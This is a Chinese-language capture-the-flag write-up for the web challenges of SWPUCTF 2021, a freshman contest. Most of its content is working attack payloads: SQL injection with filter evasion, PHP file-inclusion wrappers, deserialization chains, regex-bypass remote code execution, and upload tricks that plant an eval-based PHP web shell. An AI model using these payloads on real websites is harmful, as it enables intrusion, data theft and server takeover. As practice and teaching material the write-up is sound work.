SWPUCTF 2021 新生赛-WEB部分wp

目录

gift_F12

jicao

easy_md5

easy_sql

include

easyrce

Do_you_know_http

ez_unserialize

easyupload1.0

easyupload2.0

easyupload3.0

no_wakeup

PseudoProtocols

error

hardrce

pop

sql

finalrce

hardrce_3

---

gift_F12

查看源代码即可

jicao

源代码：

<?php
highlight_file('index.php');
include("flag.php");
$id=$_POST['id'];
$json=json_decode($_GET['json'],true);
if ($id=="wllmNB"&&$json['x']=="wllm")
{echo $flag;}
?>

 json绕过主要思路还是弱类型绕过

在两个等号时会转化成同一类型再进行比较，直接构造一个0就可以相等了

 payload：

GET:
?json={"x":0}
POST:
id=wllmNB

easy_md5

源代码：

<?php 
 highlight_file(__FILE__);
 include 'flag2.php';
 
if (isset($_GET['name']) && isset($_POST['password'])){
    $name = $_GET['name'];
    $password = $_POST['password'];
    if ($name != $password && md5($name) == md5($password)){
        echo $flag;
    }
    else {
        echo "wrong!";
    }
 
}
else {
    echo 'wrong!';
}
?> 

MD5的弱类型比较

payload：

GET:
?name=240610708

POST:
password=QLTHNDT

easy_sql

杰哥，彻底疯狂！！！

看一下源代码

发现title有点不对劲

先查看一下字段列数

?wllm=-1' order by 3--+
?wllm=-1' order by 4--+

查看回显

?wllm=-1' union select 1,2,3--+

查看数据库名

?wllm=-1' union select 1,2,database()--+

 查看表名

?wllm=-1' union select 1,(select group_concat(table_name) from information_schema.tables where table_schema = 'test_db' ),3 --+

查看对应表的列名

?wllm=-1' union select 1,(select group_concat(column_name) from information_schema.columns where table_schema = 'test_db' and table_name='test_tb' ),3 --+

查看flag

?wllm=-1' union select 1,(select group_concat(concat_ws(0x7e,flag))from test_tb),3 --+

include

那就传一个

文件包含

payload：

?file=php://filter/convert.base64-encode/resource=flag.php

base64解密

easyrce

浅试一下

?url=system('ls /');

?url=system('cat /f*');

Do_you_know_http

有点懵，抓个包试试

将User-Agent修改为WLLM，得到地址a.php,访问一下

 修改X-Forwarded-For: 127.0.0.1即可

ez_unserialize

woc，原（可惜我已经有胡桃了）

源代码：

 <?php

error_reporting(0);
show_source("cl45s.php");

class wllm{

    public $admin;
    public $passwd;

    public function __construct(){
        $this->admin ="user";
        $this->passwd = "123456";
    }

        public function __destruct(){
        if($this->admin === "admin" && $this->passwd === "ctf"){
            include("flag.php");
            echo $flag;
        }else{
            echo $this->admin;
            echo $this->passwd;
            echo "Just a bit more!";
        }
    }
}

$p = $_GET['p'];
unserialize($p);

?> 

payload：

<?php
class wllm{

    public $admin;
    public $passwd;

    public function __construct(){
        $this->admin ="admin";
        $this->passwd = "ctf";
    }
}
$a=new wllm();
$b=serialize($a);
echo $b;
?> 

?p=O:4:"wllm":2:{s:5:"admin";s:5:"admin";s:6:"passwd";s:3:"ctf";} 

easyupload1.0

抓包

修改Content-Type

连接蚁剑 

 蚁剑上面的答案有点问题

这里我们直接post传参读phpinfo找flag

easyupload2.0

提交一句话木马

修改Content-Type和php后缀为phtml绕过

 蚁剑连接（别忘把是upload）

 拿到flag

easyupload3.0

先传一个.htaccess

<FilesMatch "jpg">
SetHandler application/x-httpd-php
</FilesMatch>

修改Content-Type

 然后在将一句话木马的php后缀改为jpg上传

a.jpg

GIF89a
<?=eval($_POST['1']);?>

post传参1=phpinfo(); 

拿到flag

no_wakeup

woc，又是原

 

与前文中ez_unserialize方法相似，不过这里要绕过_wakeup()

修改反序列化串的对象属性个数（一般大于原个数），绕过wakeup函数

payload：

<?php
class HaHaHa{


        public $admin;
        public $passwd;

        public function __construct(){
            $this->admin ="admin";
            $this->passwd ="wllm";
        }
}
$a=new HaHaHa();
$b=serialize($a);
$b = str_replace(':2:', ':3:',$b); 
echo $b;  
?>

?p=O:6:"HaHaHa":3:{s:5:"admin";s:5:"admin";s:6:"passwd";s:4:"wllm";} 

PseudoProtocols

文件包含

base64解密

 

payload：

?a=data://text/plain;base64,SSB3YW50IGZsYWc=
SSB3YW50IGZsYWc=是I want flag的base64编码

error

爆破数据库

1' and updatexml(1,concat(0x7e,(select database()),0x7e),1) #

爆破数据表

1' and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='test_db'),0x7e),1) #

 爆破列

1' and updatexml(1,concat(0x7e,substr((select flag from test_tb),1,31),0x7e),1)--+
1' and updatexml(1,concat(0x7e,substr((select flag from test_tb),20,50),0x7e),1)--+

很奇怪得抓包才能flag，两个结合即是flag

hardrce

取反过滤：取反过滤是先将命令取反，然后对其进行url编码最后在上传时再一次进行取反。

取反过滤可以绕过preg_match()过滤的所有字符和数字。

取反脚本

<?php
echo urlencode(~'取反内容');
?> 

获取取反结果后在url注入栏输入

(~取反结果1)(~取反结果2); 

这段代码中正则过滤了所有字母和一些符号，但‘~’未被过滤。我们可以用取反过滤的方法来查看文件。首先我们要使用命令system(ls /)查看目录

我们对system 和 (ls /) 发别取反

payload：

?wllm=(~%8C%86%8C%8B%9A%92)(~%D7%93%8C%DF%D0%D6);

system和(cat /flllllaaaaaaggggggg)

payload：

?wllm=(~%8C%86%8C%8B%9A%92)(~%D7%9C%9E%8B%DF%D0%99%93%93%93%93%93%9E%9E%9E%9E%9E%9E%98%98%98%98%98%98%98%D6);

pop

反序列化

源代码：

<?php

error_reporting(0);
show_source("index.php");

class w44m{

    private $admin = 'aaa';
    protected $passwd = '123456';

    public function Getflag(){
        if($this->admin === 'w44m' && $this->passwd ==='08067'){
            include('flag.php');
            echo $flag;
        }else{
            echo $this->admin;
            echo $this->passwd;
            echo 'nono';
        }
    }
}

class w22m{
    public $w00m;
    public function __destruct(){
        echo $this->w00m;
    }
}

class w33m{
    public $w00m;
    public $w22m;
    public function __toString(){
        $this->w00m->{$this->w22m}();
        return 0;
    }
}

$w00m = $_GET['w00m'];
unserialize($w00m);

?>

 payload：

<?php
 
class w44m{
 
    private $admin = 'w44m';
    protected $passwd = '08067';
 
}
 
class w22m{
    public $w00m;
}
 
class w33m{
    public $w00m;
    public $w22m;
 
}
# w22m.__destruct().w00m->w33m.__toString().w00m->w44m.Getflag()
$a = new w22m();
$b = new w33m();
$c = new w44m();
# 入口
$a->w00m=$b;
# 链子
$b->w00m=$c;
$b->w22m='Getflag';
echo urlencode(serialize($a));#用url编码是因为protected类的变量有不可见字符
?>
 

?w00m=O%3A4%3A%22w22m%22%3A1%3A%7Bs%3A4%3A%22w00m%22%3BO%3A4%3A%22w33m%22%3A2%3A%7Bs%3A4%3A%22w00m%22%3BO%3A4%3A%22w44m%22%3A2%3A%7Bs%3A11%3A%22%00w44m%00admin%22%3Bs%3A4%3A%22w44m%22%3Bs%3A9%3A%22%00%2A%00passwd%22%3Bs%3A5%3A%2208067%22%3B%7Ds%3A4%3A%22w22m%22%3Bs%3A7%3A%22Getflag%22%3B%7D%7D 

sql

 看起来跟上文中easy_sql相似

先试一试

好吧不一样，不能偷懒，我们重新开始

 这里借鉴[SWPUCTF 2021 新生赛]sql_ha0cker的博客-CSDN博客​​​​​​

因为实在没有思路了

过滤了

update
AND
DELETE
UPDATE
insert
updatexml
length 
delete
right
extractvalue
REVERSE
sys schemma
+
=
--+
left
handler
substring
rand()
LEFT
anandd
OUTFILE
INTO
'1'='1'

发现=和空格都被过滤了

于是有payload：

爆破字段（用%23代替#,/**/代替空格）

?wllm=-1'/**/order/**/by/**/4%23

爆破数据库

?wllm=-1'/**/union/**/select/**/1,database(),3%23

 爆破数据表（用like代替=）

?wllm=-1'/**/union/**/select/**/1,(select/**/group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema/**/like/**/'test_db'),3%23

 爆破列名

?wllm=-1'/**/union/**/select/**/1,(select/**/group_concat(column_name)/**/from/**/information_schema.columns/**/where/**/table_name/**/like/**/'LTLT_flag'),3%23

爆破flag

?wllm=-1'/**/union/**/select/**/1,(select/**/group_concat(concat_ws(0x7e,flag))from/**/LTLT_flag),3%23

字段的输出长度被限制，要截取字符串。

而left，right，substr，reverse关键字被过滤，可用mid。

?wllm=-1'/**/union/**/select/**/1,mid(flag,10,40),3/**/from/**/LTLT_flag%23

?wllm=-1'/**/union/**/select/**/1,mid(flag,25,50),3/**/from/**/LTLT_flag%23

 把flag拼接即可

finalrce

源代码：

 <?php
highlight_file(__FILE__);
if(isset($_GET['url']))
{
    $url=$_GET['url'];
    if(preg_match('/bash|nc|wget|ping|ls|cat|more|less|phpinfo|base64|echo|php|python|mv|cp|la|\-|\*|\"|\>|\<|\%|\$/i',$url))
    {
        echo "Sorry,you can't use this.";
    }
    else
    {
        echo "Can you see anything?";
        exec($url);
    }
} 

过滤了一堆东西

没有思路了，看了看大佬们的wp

这里用到的是linux里的tee命令，构造payload，由于ls正则表达被过滤，所以我们还需要绕过preg_match

?url=l\s / | tee 1.txt

tee命令
这里只写在本题中用到的方法

tee的功能是从标准输入读取，再写入标准输出和文件。

用法：tee [OPTION]… [FILE]…

然后就是访问flag

?url=tac /flllll\aaaaaaggggggg | tee 2.txt

拿到flag

?file=php://filter/convert.base64-encode/resource=flag.php

payload：

?file=php://filter/read=convert.base64-encode/resource=flag

base64解码

hardrce_3

源代码：

<?php
header("Content-Type:text/html;charset=utf-8");
error_reporting(0);
highlight_file(__FILE__);
if(isset($_GET['wllm']))
{
    $wllm = $_GET['wllm'];
    $blacklist = [' ','\^','\~','\|'];
    foreach ($blacklist as $blackitem)
    {
        if (preg_match('/' . $blackitem . '/m', $wllm)) {
        die("小伙子只会异或和取反？不好意思哦LTLT说不能用！！");
    }}
if(preg_match('/[a-zA-Z0-9]/is',$wllm))
{
    die("Ra'sAlGhul说用字母数字是没有灵魂的！");
}
echo "NoVic4说：不错哦小伙子，可你能拿到flag吗？";
eval($wllm);
}
else
{
    echo "蔡总说：注意审题！！！";
}
?>

与上道hard_rce相比，这道题不让使用~，|，^和空格了。

所以这个题用大佬们的自增。

$_=[];$_=@"$_";$_=$_['!'=='@'];$___=$_;$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$___.=$__;$___.=$__;$__=$_;$__++;$__++;$__++;$__++;$___.=$__;$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$___.=$__;$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$___.=$__;$____='_';$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$____.=$__;$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$____.=$__;$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$____.=$__;$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$____.=$__;$_=$$____;$___($_[_]);

这是固定格式构造出来的 assert($_POST[_]);

然后post传入 _=phpinfo();

使用时需要url编码.

%24_%3D%5B%5D%3B%24_%3D%40%22%24_%22%3B%24_%3D%24_%5B'!'%3D%3D'%40'%5D%3B%24___%3D%24_%3B%24__%3D%24_%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24___.%3D%24__%3B%24___.%3D%24__%3B%24__%3D%24_%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24___.%3D%24__%3B%24__%3D%24_%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24___.%3D%24__%3B%24__%3D%24_%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24___.%3D%24__%3B%24____%3D'_'%3B%24__%3D%24_%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24____.%3D%24__%3B%24__%3D%24_%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24____.%3D%24__%3B%24__%3D%24_%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24____.%3D%24__%3B%24__%3D%24_%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24____.%3D%24__%3B%24_%3D%24%24____%3B%24___(%24_%5B_%5D)%3B

phpinfo中没有找到flag

发现system,exec,shell_exec,popen,proc_open,passthru被禁用 .

但是可以用file_put_contents(,)

file_put_contents函数 第一个参数是文件名，第二个参数是内容。

所以 构造:

 _=file_put_contents("1.php","<?php eval(\$_POST['1']); ?>");

传入一句话木马（$前面要加一个\号转义）

然后访问/1.php，密码1蚁剑连接。